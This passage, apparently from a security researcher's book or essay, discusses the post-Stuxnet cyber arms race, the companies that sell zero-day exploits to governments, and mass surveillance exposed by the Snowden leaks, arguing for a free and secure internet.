Other governments learned of Stuxnet and saw the three main takeaways of it: attacks like these are effective, they are cheap, and they are deniable. All of these qualities are highly sought after in espionage and military attacks. In effect, this started a cyber arms race that today is a reality in most of the technically advanced nations. These nations weren’t just interested in running cyber defense programs to protect themselves against cyber attacks. They wanted to gain access to offensive capability and to be capable of launching offensive attacks themselves.

To have a credible offensive cyber program, a country will need a steady supply of new exploits. Exploits don’t last forever. They get found out and patched. New versions of the vulnerable software might require new exploits, and these exploits have to be weaponized and reliable. To have a credible offensive cyber program, a country needs a steady supply of fresh exploits.

As finding the vulnerabilities and creating the weaponized exploits is hard, most governments would need to outsource this job to experts. Where can they find such expertise from? Security companies and antivirus experts are not providing attack code: they specialize in defense, not attacks. Intelligence agencies and militaries have always turned to defense contractors when they need technology they can’t produce by themselves. This applies to exploits as well.

Simply by browsing the websites of the largest defense contractors in the world, you can easily find out that most of them advertise offensive capability to their customers. Northrop Grumman even runs radio ads claiming that they “provide governmental customers with both offensive and defensive solutions.”

However, even the defense contractors might have a hard time building the specialized expertise to locate unknown vulnerabilities and to create attacks against them. Many of them seem to end up buying their exploits from one of the several boutique companies specializing in finding zero-day vulnerabilities. Such companies have popped up in various countries. These companies go out of their way to find bugs that can be exploited and turned into security holes. Once found, the exploits are weaponized. In this way, they can be abused effectively and reliably. These attackers also try to make sure that the company behind the targeted product will never learn about the vulnerability—because if they did, they would fix the bug. Consequently, the customers and the public at large would not be vulnerable any more. This would make the exploit code worthless to the vendor.

Companies specializing in selling exploits operate around the world. Some of the known companies reside in the United States, the United Kingdom, Germany, Italy, and France. Others operate from Asia. Many of them like to portray themselves as being part of the computer security industry. However, we must not mistake them for security companies, as these companies do not want to improve computer security. Quite the opposite, these companies go to great lengths to make sure the vulnerabilities they find do not get closed, making all of us more vulnerable.

In some cases, exploits can be used for good. For example, sanctioned penetration tests done with tools like Metasploit can improve the security of an organization. But that’s not what we’re discussing here. We’re talking about creating zero-day vulnerabilities just to be used for secret offensive attacks.

The total size of the exploit export industry is hard to estimate. However, looking at public recruitment ads of the known actors as well as various defense contractors, it’s easy to see there is much more recruitment happening right now for offensive positions than for defensive roles. As an example, some U.S.-based defense contractors have more than a hundred open positions for people with Top Secret/SCI clearance to create exploits. Some of these positions specifically mention the need to create offensive exploits targeting iPhones, iPads, and Android devices.

If we look for offensive cyber attacks that have been linked back to a known government, the best known examples link back to the governments The Future of the of the United States and Israel. When the New York Times ran the story linking the U.S. Government and the Obama administration to Stuxnet, the White House started an investigation on who had leaked the information. Note that they never denied the story. They just wanted to know who leaked it.

As the U.S. is engaging in offensive cyber attacks on other countries, certainly other countries feel that they are free to do the same. This cyber arms race has created an increasing demand for exploits.

Government Surveillance

When the Internet became commonplace in the mid-1990s, the decision makers ignored it. They didn’t see it as important or in any way relevant to them. As a direct result, global freedom flourished in the unrestricted online world. Suddenly people all over the world had in their reach something truly and really global. And suddenly, people weren’t just consuming content; they were creating content for others to see.

But eventually politicians and leaders realized just how important the Internet is. And they realized how useful the Internet was for other purposes—especially for the purposes of doing surveillance on citizens.

The two arguably most important inventions of our generation, the Internet and mobile phones, changed the world. However, they both turned out to be perfect tools for the surveillance state. And in a surveillance state, everybody is assumed guilty.

Internet surveillance really become front-page material when Edward Snowden started leaking information on PRISM, XKeyscore, and other NSA programs in the summer of 2013.

But don’t get me wrong. I do understand the need for doing both monitoring and surveillance. If somebody is suspected of running a drug ring, or planning a school shooting, or participating in a terror organization, he should be monitored, with a relevant court order.

However, that’s not what PRISM is about. PRISM is not about monitoring suspicious people. PRISM is about monitoring everyone. It’s about monitoring people that are known to be innocent. And it’s about building dossiers on everyone, eventually going back decades. Such dossiers, based on our Internet activity, will build a thorough picture of us. And if the powers-that-be ever need to find a way to twist your hand, they would certainly find something suspicious or embarrassing on everyone, if they have enough of their Internet history recorded.

United States intelligence agencies have a full legal right to monitor foreigners. Which doesn’t sound too bad—until your realize that most of us are foreigners to the Americans. In fact, 96 percent of the people on the planet turn out to be such foreigners. And when these people use U.S.- based services, they are legally under surveillance.

When the PRISM leaks started, U.S. intelligence tried to calm the rest of the world by explaining how there’s no need to worry, and about how these programs were just about fighting terrorists. But then further leaks proved the U.S. was using their tools to monitor the European Commission and the United Nations as well. It’s difficult for them to argue that they were trying to find terrorists at the European Union headquarters.

Another argument we’ve heard from the U.S. intelligence apparatus is that everyone else is doing Internet surveillance too. And indeed, most countries do have intelligence agencies, and most of them do monitor what other countries are doing. However, the U.S. has an unfair advantage. Almost all of the common Internet services, search engines, webmails, web browsers, and mobile operating systems come from the U.S. To put in another way: How many Spanish politicians and decision makers use American services? Answer: all of them. And how many American politicians and decision makers use Spanish services? Answer: none of them.

All this should make it obvious that we foreigners should not use U.S.-based services. They’ve proven to us that they are not trustworthy. Why would we voluntarily hand our data to a foreign intelligence agency?

But in practice, it’s very hard to avoid using services like Google, Facebook, LinkedIn, Dropbox, Amazon, Skydrive, iCloud, Android, Windows, iOS, and so on. This is a clear example of the failure of Europe, Asia, and Africa to compete with the U.S. on Internet services. And when the rest of the world does produce a global hit—like Skype or Nokia—it typically ends up acquired by an American company, bringing it under U.S. control.

But if you’re not doing anything wrong, why worry about this? Or, if you are worrying about this, what do you have to hide? My answer to this question is that I have nothing to hide… but I have nothing in particular that I’d want to share with an intelligence agency either. In particular, I have nothing to share with a foreign intelligence agency. If we really need a big brother, I’d much rather have a domestic big brother than a foreign big brother.

People have asked me if they really should worry about PRISM. I’ve told them that they should not be worried—they should be outraged instead. We should not just accept such blanket and wholesale surveillance from one country on the rest of the world.

Advancements in computing power and data storage have made wholesale surveillance possible. But they’ve also made leaking possible. That’s how Edward Snowden could steal three laptops which contained so much information that, printed out, it would be a long row of trucks full of paper.

Leaking has become so easy that it will keep organizations worrying about getting caught over any wrongdoing. We might hope that this would force organizations to avoid unethical practices.

While governments are watching over us, they know we are watching over them.


We’ve seen massive shifts in cyber attacks over the last two decades: from simple viruses written by teenagers to multimillion-dollar cyber attacks launched by nation-states.

All this is happening right now, during our generation. We were the first generation that got online. We should do what we can to secure the net and keep it free so that it will be there for future generations to enjoy.